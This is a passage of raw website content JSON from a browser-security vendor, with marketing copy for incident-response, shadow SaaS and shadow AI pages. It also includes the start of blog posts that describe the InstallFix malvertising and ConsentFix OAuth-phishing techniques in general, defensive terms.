SOAR","https://cdn.builder.io/o/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2Fd00e39d3b6e346c296261d875cf55652%2Fcompressed?apiKey=f3a1111ff5be48cdbb123cd9f5795a05&token=d00e39d3b6e346c296261d875cf55652&alt=media&optimized=true",{"large":954},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125,"backgroundColor":342},{"@type":106,"@version":107,"id":956,"meta":957,"component":958,"responsiveStyles":960},"builder-8a0a8ea63f5d48dd8a6726f2d49cf0ca",{"previousId":716},{"name":346,"options":959,"isRSC":118},{"AllPartners":41,"backgroundTransparent":6},{"large":961},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125,"backgroundColor":350},{"@type":106,"@version":107,"id":963,"meta":964,"component":965,"responsiveStyles":967},"builder-2df65c3f54334df2b26e7cb744886cdc",{"previousId":723},{"name":354,"options":966,"isRSC":118},{"darkMode":41},{"large":968},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125},{"@type":106,"@version":107,"id":970,"component":971,"responsiveStyles":976},"builder-2c32c869efc2423ab69ef06b150e9f97",{"name":359,"tag":359,"options":972,"isRSC":118},{"darkMode":6,"maxWidth":363,"maxTextWidth":364,"title":973,"description":974,"image":975,"reverse":6},"\u003Ch2>See attacks unfold, not just their aftermath\u003C/h2>","\u003Cp>Attacks happen in the browser, not in logs. Push captures what traditional tools miss: what users clicked, what loaded, what was entered, and how attackers moved. That gives you real-world evidence, not just assumptions, when every second matters.\u003C/p>\u003Cp>\u003Cbr>\u003C/p>\u003Cp>\u003Cbr>\u003C/p>","https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2F36fc719bd1de4a38b916f4d25c81a26d",{"large":977},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125},{"@type":106,"@version":107,"id":979,"meta":980,"component":981,"responsiveStyles":986},"builder-370e53c6016e432db01e9193a2ce90f6",{"previousId":739},{"name":373,"options":982,"isRSC":118},{"darkMode":6,"maxWidth":363,"imageMaxWidth":375,"textPaddingTop":376,"title":983,"description":984,"reverse":41,"image":985},"\u003Ch2>Investigate faster with high-fidelity data\u003C/h2>","\u003Cp>Reconstructing an incident shouldn’t feel like guesswork. Push records detailed telemetry from inside the browser: page loads, credential inputs, DOM changes, session activity, user behavior. It’s structured, exportable, and ready to plug into your investigation workflows, so you can move fast without digging through proxy logs or relying on user reports.\u003C/p>","https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2Fa6adda040e684e67a8d68a55c5ce5f6d",{"large":987},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125,"fontFamily":382,"paddingTop":384,"marginTop":384},{"@type":106,"@version":107,"id":989,"meta":990,"component":991,"responsiveStyles":996},"builder-a7f3767a8d184bd08fb24520bf210e95",{"previousId":749},{"name":373,"options":992,"isRSC":118},{"darkMode":6,"maxWidth":363,"imageMaxWidth":375,"textPaddingTop":389,"title":993,"description":994,"reverse":6,"image":995},"\u003Ch2>Contain and respond in real time\u003C/h2>","\u003Cp>When something looks off, Push doesn’t just alert you, it gives you options. Guide users with in-browser prompts. Terminate sessions. Trigger SOAR workflows. Enrich SIEM alerts. Push gives you the context and control to stop spread before it starts.\u003C/p>","https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2Fb3dedeed5aba4847a2c2d22e10d0ec12",{"large":997},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125,"paddingTop":395},{"@type":106,"@version":107,"layerName":373,"id":999,"meta":1000,"component":1001,"responsiveStyles":1006},"builder-b92036ee0ece4b32acdbdcc7c377366b",{"previousId":759},{"name":373,"options":1002,"isRSC":118},{"darkMode":6,"maxWidth":363,"imageMaxWidth":375,"textPaddingTop":400,"title":1003,"description":1004,"reverse":41,"image":1005},"\u003Ch2>Prevent the next one\u003C/h2>","\u003Cp>Push helps you respond fast, but it also helps you fix what went wrong. It surfaces misconfigurations and risky behaviors that made the attack possible in the first place, then guides users in-browser to remediate. One tool. Full loop. No loose ends.\u003C/p>","https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2Fc1ecc2d5d3814b62b072fac01827ff96",{"large":1007},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125,"paddingTop":406},{"@type":106,"@version":107,"id":1009,"meta":1010,"component":1011,"responsiveStyles":1013},"builder-5e8ae39655274de89da32ab573a2525a",{"previousId":769},{"name":354,"options":1012,"isRSC":118},{"darkMode":6},{"large":1014},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125},{"@type":106,"@version":107,"id":1016,"component":1017,"responsiveStyles":1019},"builder-dfd6850cfb4741d2b8a0c16c2780f00a",{"name":416,"tag":416,"options":1018,"isRSC":118},{"sectionHeading":37,"customClass":418},{"large":1020},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125},{"id":1022,"@type":106,"tagName":131,"properties":1023,"responsiveStyles":1024},"builder-pixel-z197gdgcmu",{"src":133,"aria-hidden":134,"alt":37,"role":135,"width":124,"height":124},{"large":1025},{"height":124,"width":124,"display":138,"opacity":124,"overflow":139,"pointerEvents":140},{"deviceSize":142,"location":1027},{"path":37,"query":1028},{},{},1770892908052,1745427419274,"https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2Fb07017bfd318431690a5bb35bda35b99",[],{"kind":438,"breakpoints":1035,"originalContentId":681,"winningTest":118,"lastPreviewUrl":1036,"hasLinks":6,"hasAutosaves":6},{"xsmall":57,"small":39,"medium":40},"https://pushsecurity.com/uc/incident-response?builder.space=f3a1111ff5be48cdbb123cd9f5795a05&builder.user.permissions=read%2Ccreate%2Cpublish%2CeditCode%2CeditDesigns%2CeditLayouts%2CeditLayers%2CeditContentPriority%2CeditFolders%2CeditProjects%2CmodifyMcpServers%2CmodifyWorkflowIntegrations%2CmodifyProjectSettings%2CconnectCodeRepository%2CcreateProjects%2CindexDesignSystems%2CsendPullRequests&builder.user.role.name=Developer&builder.user.role.id=developer&builder.cachebust=true&builder.preview=use-case-page&builder.noCache=true&builder.allowTextEdit=true&__builder_editing__=true&builder.overrides.use-case-page=a9d5556e77f84a37b5bd52310a7110c1&builder.overrides.a9d5556e77f84a37b5bd52310a7110c1=a9d5556e77f84a37b5bd52310a7110c1&builder.overrides.use-case-page:/uc/incident-response=a9d5556e77f84a37b5bd52310a7110c1&builder.options.includeRefs=true&builder.options.enrich=true&builder.options.locale=Default",{"createdDate":1038,"id":1039,"name":1040,"modelId":261,"published":13,"query":1041,"data":1044,"variations":1149,"lastUpdated":1150,"firstPublished":1151,"testRatio":33,"screenshot":1152,"createdBy":34,"lastUpdatedBy":674,"folders":1153,"meta":1154,"rev":440},1746122471259,"5f118e24433d46ceb79f5099987156d7","Shadow SaaS",[1042],{"@type":264,"property":265,"operator":266,"value":1043},"/uc/shadow-saas",{"seoTitle":1045,"seoDescription":1046,"customFonts":1047,"fontAwesomeIcon":1052,"title":1053,"jsCode":37,"tsCode":37,"blocks":1054,"url":1043,"state":1146},"Find and secure shadow SaaS","See and control shadow SaaS in the browser.",[1048],{"kind":273,"variants":1049,"files":1050,"family":272,"version":274,"subsets":1051,"lastModified":275,"category":295,"menu":296},[301,302,303,304,305,306,128,307,308,309,310,311,312,313,314,315,316,317],{"100":277,"200":278,"300":279,"500":280,"600":281,"700":282,"800":283,"900":284,"300italic":293,"500italic":292,"regular":290,"900italic":286,"italic":289,"100italic":288,"200italic":291,"600italic":294,"700italic":287,"800italic":285},[298,299],"faShieldCheck","Secure shadow SaaS",[1055,1141],{"@type":106,"@version":107,"tagName":323,"id":1056,"meta":1057,"children":1058},"builder-04da805c4cd34652a2db452fcda52e1d",{"previousId":935},[1059,1075,1082,1089,1098,1108,1118,1128,1135],{"@type":106,"@version":107,"id":1060,"meta":1061,"component":1062,"responsiveStyles":1073},"builder-830d414faeaf41439142f9157e8288c8",{"previousId":939},{"name":327,"options":1063,"isRSC":118},{"title":1045,"description":1064,"points":1065,"video":1072},"\u003Cp>SaaS sprawl is one of today’s fastest-growing security blind spots because most tools monitor around the edges. Push sees it at the source, in the browser, revealing every app users access, flagging risky tools, and helping you shut down exposure before it leads to a breach. No guesswork. No nasty surprises. Just real-time visibility and control.\u003C/p>",[1066,1068,1070],{"item":1067},"Discover every SaaS app users access, managed or not",{"item":1069},"Spot accounts with weak security postures like missing MFA, unmanaged access, and no SSO",{"item":1071},"Control usage with in-browser prompts, blocks, and security guardrails","https://cdn.builder.io/o/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2F3e4eece318d04d6586e691d59d0741cf%2Fcompressed?apiKey=f3a1111ff5be48cdbb123cd9f5795a05&token=3e4eece318d04d6586e691d59d0741cf&alt=media&optimized=true",{"large":1074},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125,"backgroundColor":342},{"@type":106,"@version":107,"id":1076,"meta":1077,"component":1078,"responsiveStyles":1080},"builder-cd7833f966cb4c7e8adf0d6c979414a6",{"previousId":956},{"name":346,"options":1079,"isRSC":118},{"AllPartners":41,"backgroundTransparent":6},{"large":1081},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125,"backgroundColor":350},{"@type":106,"@version":107,"id":1083,"meta":1084,"component":1085,"responsiveStyles":1087},"builder-49d720b45430454e8b08c526f267c19f",{"previousId":963},{"name":354,"options":1086,"isRSC":118},{"darkMode":41},{"large":1088},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125},{"@type":106,"@version":107,"id":1090,"component":1091,"responsiveStyles":1096},"builder-3dde0bf6c8544e5e9ab41b18a9d68034",{"name":359,"tag":359,"options":1092,"isRSC":118},{"darkMode":6,"maxWidth":363,"maxTextWidth":364,"title":1093,"description":1094,"image":1095,"reverse":6},"\u003Ch2>Use your browser to curb Saas Sprawl\u003C/h2>","\u003Cp>Shadow SaaS isn’t hiding in your network, it’s in your browser. From AI tools to unsanctioned file-sharing sites, security risks live in the apps your users sign into every day. Push maps your organization's true SaaS footprint in real time, exposing apps and accounts with unmanaged access, poor authentication, or no security oversight.\u003C/p>\u003Cp>\u003Cbr>\u003C/p>\u003Cp>\u003Cbr>\u003C/p>","https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2Fb6811a214c7949b6bbe0b9a3bca62efd",{"large":1097},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125},{"@type":106,"@version":107,"id":1099,"meta":1100,"component":1101,"responsiveStyles":1106},"builder-e2420451ccdc4f088d0a4904cff45935",{"previousId":979},{"name":373,"options":1102,"isRSC":118},{"darkMode":6,"maxWidth":363,"imageMaxWidth":375,"textPaddingTop":376,"title":1103,"description":1104,"reverse":41,"image":1105},"\u003Ch2>Discover hidden SaaS usage\u003C/h2>","\u003Cp>Push captures live browser telemetry across every tab and session. Whether a user signs into a sanctioned app with a personal account or tries a new AI plugin, you’ll see it in real time, with no integrations or manual tagging.\u003C/p>","https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2Fe16e301f9af94665b95d98232a863d8a",{"large":1107},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125,"fontFamily":382,"paddingTop":384,"marginTop":384},{"@type":106,"@version":107,"id":1109,"meta":1110,"component":1111,"responsiveStyles":1116},"builder-b36de7fce7994beea9e58d94662e7166",{"previousId":989},{"name":373,"options":1112,"isRSC":118},{"darkMode":6,"maxWidth":363,"imageMaxWidth":375,"textPaddingTop":389,"title":1113,"description":1114,"reverse":6,"image":1115},"\u003Ch2>Spot risky access and unsafe usage\u003C/h2>","\u003Cp>Discovery is just the beginning. Push flags apps with risky traits, no MFA, no SSO, known vulnerabilities, or broad access scopes. You’ll know which tools introduce real risk, and which users are exposed so you can act with precision.\u003C/p>","https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2F6585f3c242da4d70ae3cb7d02f481bef",{"large":1117},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125,"paddingTop":395},{"@type":106,"@version":107,"layerName":373,"id":1119,"meta":1120,"component":1121,"responsiveStyles":1126},"builder-dc366b5134684fe7a508edf8913103ea",{"previousId":999},{"name":373,"options":1122,"isRSC":118},{"darkMode":6,"maxWidth":363,"imageMaxWidth":375,"textPaddingTop":400,"title":1123,"description":1124,"reverse":41,"image":1125},"\u003Ch2>Close gaps before they grow\u003C/h2>","\u003Cp>Push turns insight into action. When risky SaaS use is detected, guide users to enable MFA, block high-risk apps, or apply in-browser guardrails automatically. All without deploying new infrastructure or managing dozens of integrations.\u003C/p>","https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2Fe6d60b6d91414819bc6258a318f00557",{"large":1127},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125,"paddingTop":406},{"@type":106,"@version":107,"id":1129,"meta":1130,"component":1131,"responsiveStyles":1133},"builder-8708f6f0d8da4b3f9e17bf16cda70219",{"previousId":1009},{"name":354,"options":1132,"isRSC":118},{"darkMode":6},{"large":1134},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125},{"@type":106,"@version":107,"id":1136,"component":1137,"responsiveStyles":1139},"builder-8ff4b38d60534cf28cb523ab0f754875",{"name":416,"tag":416,"options":1138,"isRSC":118},{"sectionHeading":37,"customClass":418},{"large":1140},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125},{"id":1142,"@type":106,"tagName":131,"properties":1143,"responsiveStyles":1144},"builder-pixel-d1ul2kmxbed",{"src":133,"aria-hidden":134,"alt":37,"role":135,"width":124,"height":124},{"large":1145},{"height":124,"width":124,"display":138,"opacity":124,"overflow":139,"pointerEvents":140},{"deviceSize":142,"location":1147},{"path":37,"query":1148},{},{},1770892936802,1746714967208,"https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2F01bfb2304521412fbd2e1a1180904d40",[],{"originalContentId":919,"winningTest":118,"lastPreviewUrl":1155,"breakpoints":1156,"kind":438,"hasLinks":6,"hasAutosaves":6},"https://pushsecurity.com/uc/shadow-saas?builder.space=f3a1111ff5be48cdbb123cd9f5795a05&builder.user.permissions=read%2Ccreate%2Cpublish%2CeditCode%2CeditDesigns%2CeditLayouts%2CeditLayers%2CeditContentPriority%2CeditFolders%2CeditProjects%2CmodifyMcpServers%2CmodifyWorkflowIntegrations%2CmodifyProjectSettings%2CconnectCodeRepository%2CcreateProjects%2CindexDesignSystems%2CsendPullRequests&builder.user.role.name=Developer&builder.user.role.id=developer&builder.cachebust=true&builder.preview=use-case-page&builder.noCache=true&builder.allowTextEdit=true&__builder_editing__=true&builder.overrides.use-case-page=5f118e24433d46ceb79f5099987156d7&builder.overrides.5f118e24433d46ceb79f5099987156d7=5f118e24433d46ceb79f5099987156d7&builder.overrides.use-case-page:/uc/shadow-saas=5f118e24433d46ceb79f5099987156d7&builder.options.includeRefs=true&builder.options.enrich=true&builder.options.locale=Default",{"xsmall":57,"small":39,"medium":40},{"createdDate":1158,"id":1159,"name":1160,"modelId":261,"published":13,"query":1161,"data":1164,"variations":1268,"lastUpdated":1269,"firstPublished":1270,"testRatio":33,"screenshot":1271,"createdBy":34,"lastUpdatedBy":674,"folders":1272,"meta":1273,"rev":440},1764707470172,"b62629ce2f3741158d961cd10fe74b31","Shadow AI",[1162],{"@type":264,"property":265,"operator":266,"value":1163},"/uc/shadow-ai",{"fontAwesomeIcon":1165,"seoTitle":1166,"jsCode":37,"customFonts":1167,"title":1172,"tsCode":37,"seoDescription":1173,"blocks":1174,"url":1163,"state":1265},"faBrainCircuit","Secure AI native and AI enhanced apps. ",[1168],{"variants":1169,"category":295,"files":1170,"subsets":1171,"family":272,"kind":273,"menu":296,"lastModified":275,"version":274},[301,302,303,304,305,306,128,307,308,309,310,311,312,313,314,315,316,317],{"100":277,"200":278,"300":279,"500":280,"600":281,"700":282,"800":283,"900":284,"800italic":285,"regular":290,"700italic":287,"200italic":291,"italic":289,"500italic":292,"600italic":294,"300italic":293,"100italic":288,"900italic":286},[298,299],"Secure shadow AI","See and control shadow AI apps in the browser.",[1175,1260],{"@type":106,"@version":107,"tagName":323,"id":1176,"meta":1177,"children":1178},"builder-a6e5717a2c914d5695058e4ee201a05d",{"previousId":1056},[1179,1195,1202,1209,1219,1228,1237,1247,1254],{"@type":106,"@version":107,"id":1180,"meta":1181,"component":1182,"responsiveStyles":1193},"builder-3e0ed678683f4a0eb7aa00253cf263b2",{"previousId":1060},{"name":327,"options":1183,"isRSC":118},{"title":1172,"description":1184,"points":1185,"image":1192},"\u003Cp>Your employees are adopting AI faster than you can track it. From native features in corporate apps to unapproved shadow tools, it’s all happening in the browser. Push detects every AI interaction in real time, letting you categorize apps and enforce acceptable use policies in the browser.\u003C/p>",[1186,1188,1190],{"item":1187},"Map every AI tool used across your workforce",{"item":1189},"Review and classify apps by sensitivity, purpose, and policy status",{"item":1191},"Enforce AI usage rules directly in the browser","https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2F33cf153d920f4e389f3650253577cff7",{"large":1194},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125,"backgroundColor":342},{"@type":106,"@version":107,"id":1196,"meta":1197,"component":1198,"responsiveStyles":1200},"builder-76968f8471d14893b8189d75b08fb426",{"previousId":1076},{"name":346,"options":1199,"isRSC":118},{"AllPartners":41,"backgroundTransparent":6},{"large":1201},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125,"backgroundColor":350},{"@type":106,"@version":107,"id":1203,"meta":1204,"component":1205,"responsiveStyles":1207},"builder-b55b9d4bc5a649d8839ce7f6c2043d95",{"previousId":1083},{"name":354,"options":1206,"isRSC":118},{"darkMode":41},{"large":1208},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125},{"@type":106,"@version":107,"id":1210,"meta":1211,"component":1212,"responsiveStyles":1217},"builder-c3f38ef4d75d4989a29b5903175ed8a1",{"previousId":1090},{"name":359,"tag":359,"options":1213,"isRSC":118},{"darkMode":6,"maxWidth":363,"maxTextWidth":364,"title":1214,"description":1215,"image":1216,"reverse":6},"\u003Ch2>Use your browser to govern AI \u003C/h2>","\u003Cp>The AI footprint inside your company is bigger than you think. From text generators to meeting assistants and design copilots, employees test, adopt, and connect new tools constantly. Push shows you those tools and which users are accessing them, without relying on network scans or API integrations.\u003C/p>","https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2F30b43bda6f1644c19478fb1efa20050c",{"large":1218},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125},{"@type":106,"@version":107,"id":1220,"meta":1221,"component":1222,"responsiveStyles":1226},"builder-90ee9cb9afc44e7f885523715bf51a53",{"previousId":1099},{"name":373,"options":1223,"isRSC":118},{"darkMode":6,"maxWidth":363,"imageMaxWidth":375,"textPaddingTop":376,"title":1224,"description":1225,"reverse":41,"image":1115},"\u003Ch2>Discover every AI tool users touch\u003C/h2>","\u003Cp>Push captures live telemetry from the browser, identifying every AI-native and AI-enhanced application users access. You’ll know which corporate identities are connected, how data flows, and what new AI apps appear across your environment. \u003C/p>",{"large":1227},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125,"fontFamily":382,"paddingTop":384,"marginTop":384},{"@type":106,"@version":107,"id":1229,"meta":1230,"component":1231,"responsiveStyles":1235},"builder-9e44539fa53c4d8e87406036c921fc46",{"previousId":1109},{"name":373,"options":1232,"isRSC":118},{"darkMode":6,"maxWidth":363,"imageMaxWidth":375,"textPaddingTop":389,"title":1233,"description":1234,"reverse":6,"image":1125},"\u003Ch2>Classify and manage AI risk\u003C/h2>","\u003Cp>For apps you choose to allow, Push lets you apply custom in-browser banners. You can bulk-select categories of AI tools and require users to read and acknowledge your acceptable use policy before they proceed. This creates an auditable trail and moves policy from an easy to forget document to an active, in-workflow control.\u003C/p>",{"large":1236},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125,"paddingTop":395},{"@type":106,"@version":107,"layerName":373,"id":1238,"meta":1239,"component":1240,"responsiveStyles":1245},"builder-44c1a891926f4bdeaaa37e90721fe6ac",{"previousId":1119},{"name":373,"options":1241,"isRSC":118},{"darkMode":6,"maxWidth":363,"imageMaxWidth":375,"textPaddingTop":400,"title":1242,"description":1243,"reverse":41,"image":1244},"\u003Ch2>Enforce your AI policy in the browser\u003C/h2>","\u003Cp>When an AI tool is deemed non-compliant or too risky, Push blocks it at the source. The block happens directly in the browser, preventing the user from accessing the site or submitting data. This gives you an immediate, powerful lever to stop data exfiltration and enforce a hard line on unacceptable risk.\u003C/p>","https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2Fa359ac1805af4e15a8a7f84632b9bb55",{"large":1246},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125,"paddingTop":406},{"@type":106,"@version":107,"id":1248,"meta":1249,"component":1250,"responsiveStyles":1252},"builder-dcc906f9cbe54dc68b3c672668e7a38f",{"previousId":1129},{"name":354,"options":1251,"isRSC":118},{"darkMode":6},{"large":1253},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125},{"@type":106,"@version":107,"id":1255,"component":1256,"responsiveStyles":1258},"builder-d2d64780c31b4349bc75805b23a07e38",{"name":416,"tag":416,"options":1257,"isRSC":118},{"sectionHeading":37,"customClass":418},{"large":1259},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125},{"id":1261,"@type":106,"tagName":131,"properties":1262,"responsiveStyles":1263},"builder-pixel-wxx9tk70r9p",{"src":133,"aria-hidden":134,"alt":37,"role":135,"width":124,"height":124},{"large":1264},{"height":124,"width":124,"display":138,"opacity":124,"overflow":139,"pointerEvents":140},{"deviceSize":142,"location":1266},{"path":37,"query":1267},{},{},1770892957225,1764950077593,"https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2Fe558b8b069884037a8e6904f7ecc029c",[],{"winningTest":118,"breakpoints":1274,"originalContentId":1039,"kind":438,"lastPreviewUrl":1275,"hasLinks":6,"hasAutosaves":41},{"xsmall":57,"small":39,"medium":40},"https://pushsecurity.com/uc/shadow-ai?builder.space=f3a1111ff5be48cdbb123cd9f5795a05&builder.user.permissions=read%2Ccreate%2Cpublish%2CeditCode%2CeditDesigns%2CeditLayouts%2CeditLayers%2CeditContentPriority%2CeditFolders%2CeditProjects%2CmodifyMcpServers%2CmodifyWorkflowIntegrations%2CmodifyProjectSettings%2CconnectCodeRepository%2CcreateProjects%2CindexDesignSystems%2CsendPullRequests&builder.user.role.name=Developer&builder.user.role.id=developer&builder.cachebust=true&builder.preview=use-case-page&builder.noCache=true&builder.allowTextEdit=true&__builder_editing__=true&builder.overrides.use-case-page=b62629ce2f3741158d961cd10fe74b31&builder.overrides.b62629ce2f3741158d961cd10fe74b31=b62629ce2f3741158d961cd10fe74b31&builder.overrides.use-case-page:/uc/shadow-ai=b62629ce2f3741158d961cd10fe74b31&builder.options.includeRefs=true&builder.options.enrich=true&builder.options.locale=Default",{"_path":1277,"_dir":1278,"_draft":6,"_partial":6,"_locale":37,"sys":1279,"ogImage":118,"summary":1282,"title":1296,"subtitle":118,"metaTitle":1297,"synopsis":1298,"hashTags":118,"publishedDate":1299,"slug":1300,"tagsCollection":1301,"relatedBlogPostsCollection":1311,"authorsCollection":3404,"content":3412,"_id":4638,"_type":4639,"_source":4640,"_file":4641,"_stem":4642,"_extension":4639},"/blog/installfix","blog",{"id":1280,"publishedAt":1281},"7bG71Eo43crbIHKzczooVS","2026-03-16T11:36:37.630Z",{"json":1283},{"data":1284,"content":1285,"nodeType":1295},{},[1286],{"data":1287,"content":1288,"nodeType":1294},{},[1289],{"data":1290,"marks":1291,"value":1292,"nodeType":1293},{},[],"Attackers are distributing almost identical cloned sites of popular developer tools like Claude Code with fake install instructions via malicious search engine ads — tricking victims into installing infostealer malware instead. ","text","paragraph","document","InstallFix: How attackers are weaponizing malvertised install guides  ","InstallFix: Weaponizing malvertised install guides  ","Attackers are impersonating popular developer tools like Claude Code to distribute fake install instructions via malicious search engine ads.","2026-03-06T00:00:00.000Z","installfix",{"items":1302},[1303,1307],{"sys":1304,"name":1306},{"id":1305},"6A5RXS31ZQx3PwryGb1IMy","Browser-based attacks",{"sys":1308,"name":1310},{"id":1309},"4ksQNCFeBf8H4QIORqpRLw","Detection & response",{"items":1312},[1313,2169,2765],{"__typename":1314,"sys":1315,"content":1317,"title":2151,"synopsis":2152,"hashTags":118,"publishedDate":2153,"slug":2154,"tagsCollection":2155,"authorsCollection":2161},"BlogPosts",{"id":1316},"4jcVFrvGBtVXpKU3gDMaa2",{"json":1318},{"nodeType":1295,"data":1319,"content":1320},{},[1321,1343,1350,1359,1418,1425,1432,1436,1446,1453,1460,1519,1528,1535,1560,1567,1570,1578,1585,1592,1599,1606,1613,1620,1626,1634,1641,1660,1680,1683,1691,1698,1705,1712,1720,1739,1746,1752,1760,1780,1800,1913,1916,1924,1931,1938,1941,1949,1956,1963,1970,2037,2068,2071,2079,2086,2093,2100,2107,2139,2145],{"nodeType":1294,"data":1322,"content":1323},{},[1324,1328,1339],{"nodeType":1293,"value":1325,"marks":1326,"data":1327},"In December, the Push Security research team discovered and blocked a brand new attack technique that we coined ",[],{},{"nodeType":1329,"data":1330,"content":1332},"hyperlink",{"uri":1331},"https://pushsecurity.com/blog/consentfix/",[1333],{"nodeType":1293,"value":1334,"marks":1335,"data":1338},"ConsentFix",[1336],{"type":1337},"underline",{},{"nodeType":1293,"value":1340,"marks":1341,"data":1342},". This technique merged ClickFix-style social engineering with OAuth consent phishing to hijack Microsoft accounts. ",[],{},{"nodeType":1294,"data":1344,"content":1345},{},[1346],{"nodeType":1293,"value":1347,"marks":1348,"data":1349},"We saw this attack running across a large network of compromised websites that attackers were injecting the malicious payload into, forming a large-scale campaign that was detected across multiple customer estates. ",[],{},{"nodeType":1351,"data":1352,"content":1358},"embedded-entry-block",{"target":1353},{"sys":1354},{"id":1355,"type":1356,"linkType":1357},"603MWDqc9NsqkklIkfGNZN","Link","Entry",[],{"nodeType":1294,"data":1360,"content":1361},{},[1362,1366,1375,1379,1388,1392,1401,1405,1414],{"nodeType":1293,"value":1363,"marks":1364,"data":1365},"ConsentFix got a pretty awesome response from the community in a very short space of time. Within days, ",[],{},{"nodeType":1329,"data":1367,"content":1369},{"uri":1368},"https://www.youtube.com/watch?v=AAiiIY-Soak",[1370],{"nodeType":1293,"value":1371,"marks":1372,"data":1374},"John Hammond shared a new and improved version of the technique",[1373],{"type":1337},{},{"nodeType":1293,"value":1376,"marks":1377,"data":1378}," that he’d spun up in his own lab, while security researchers from ",[],{},{"nodeType":1329,"data":1380,"content":1382},{"uri":1381},"https://medium.com/@nitashathakur/consentfix-poc-how-the-attack-works-end-to-end-4f8b656f977d",[1383],{"nodeType":1293,"value":1384,"marks":1385,"data":1387},"Microsoft",[1386],{"type":1337},{},{"nodeType":1293,"value":1389,"marks":1390,"data":1391},", ",[],{},{"nodeType":1329,"data":1393,"content":1395},{"uri":1394},"https://www.glueckkanja.com/en/posts/2025-12-31-vulnerability-consentfix",[1396],{"nodeType":1293,"value":1397,"marks":1398,"data":1400},"Glueck Kanja",[1399],{"type":1337},{},{"nodeType":1293,"value":1402,"marks":1403,"data":1404},", and ",[],{},{"nodeType":1329,"data":1406,"content":1408},{"uri":1407},"https://msendpointmgr.com/2026/01/08/consentfix-quickfix/",[1409],{"nodeType":1293,"value":1410,"marks":1411,"data":1413},"other individual contributors",[1412],{"type":1337},{},{"nodeType":1293,"value":1415,"marks":1416,"data":1417}," all shared analysis and recommendations. ",[],{},{"nodeType":1294,"data":1419,"content":1420},{},[1421],{"nodeType":1293,"value":1422,"marks":1423,"data":1424},"In this blog, we’re sharing some new insights on the campaign, pulling together some of the top recommendations and resources shared across the community, and predicting what the future holds for this novel technique as it quickly enters the mainstream. ",[],{},{"nodeType":1294,"data":1426,"content":1427},{},[1428],{"nodeType":1293,"value":1429,"marks":1430,"data":1431},"First though, let’s quickly recap what ConsentFix is and how it works. ",[],{},{"nodeType":1433,"data":1434,"content":1435},"hr",{},[],{"nodeType":1437,"data":1438,"content":1439},"heading-1",{},[1440],{"nodeType":1293,"value":1441,"marks":1442,"data":1445},"ConsentFix 101",[1443],{"type":1444},"bold",{},{"nodeType":1294,"data":1447,"content":1448},{},[1449],{"nodeType":1293,"value":1450,"marks":1451,"data":1452},"ConsentFix is an attack technique that prompts the victim to share an OAuth authorization code with an attacker via a phishing page. The attacker then enters this code into a target application on their own device in order to complete the authorization handshake and take over the account. ",[],{},{"nodeType":1294,"data":1454,"content":1455},{},[1456],{"nodeType":1293,"value":1457,"marks":1458,"data":1459},"By hijacking OAuth, attackers can effectively bypass identity-layer controls like passwords and MFA — even phishing resistant authentication methods like passkeys have no impact on this attack, because it sidesteps the authentication process altogether. ",[],{},{"nodeType":1294,"data":1461,"content":1462},{},[1463,1467,1476,1480,1489,1493,1502,1506,1515],{"nodeType":1293,"value":1464,"marks":1465,"data":1466},"OAuth abuse attacks are not new. Techniques like ",[],{},{"nodeType":1329,"data":1468,"content":1470},{"uri":1469},"https://github.com/pushsecurity/saas-attacks/blob/main/techniques/consent_phishing/description.md",[1471],{"nodeType":1293,"value":1472,"marks":1473,"data":1475},"consent 